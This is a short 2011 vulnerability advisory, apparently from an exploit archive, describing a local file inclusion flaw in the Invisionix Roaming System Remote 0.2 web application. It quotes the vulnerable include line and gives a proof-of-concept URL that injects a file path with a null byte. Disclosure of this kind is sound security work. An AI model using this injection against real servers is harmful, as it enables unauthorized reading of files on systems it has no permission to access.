Invisionix Roaming System Remote metasys 0.2 LFI Vulnerability

🗓️ 29 May 2011 00:00:00Reported by Treasure PriyamalType

zdt🔗 0day.today👁 15 Views

Invisionix Roaming System Remote metasys 0.2 LFI Vulnerability. Portable PC system utilizing web hosting resources accessed via web browser-enabled appliance

Site ................... :  http://sourceforge.net/projects/irsr/
Download ............... :  http://space.dl.sourceforge.net/project/irsr/irsr/irsr-0.2/irsr-0.2.ZIP
Author ................. :  Treasure Priyamal
Contact ................ :  treasure[at]treasuresec.com
 
Note : Successful exploitation requires that "register_globals" is enabled.    
  
========================================================================
  
Description:
  
Your own portable PC system built by integrating existing Open Source components.
 This mobile metasystem utilizes the internet's web hosting resources and is accessed
 via any web browser enabled appliance from your home, work, school, library, cafes, etc
  
========================================================================
  
*************************************************
[!]This other sample vuln c0de which affected to LFI [!]
*************************************************
 
There is a vulnerability in almost every file directory , for example in this Directory file:
 
[-] system/default.php
 
require_once ($globalIncludeFilePath);          // System's global include file.
 
-=[ P0C LFI ]=-
 
http://localhost/irsr/authenticate/sessions.php?globalIncludeFilePath=[LFI]%00
========================================================================



#  0day.today [2018-03-20]  #

29 May 2011 00:00Current

7.1High risk

Vulners AI Score7.1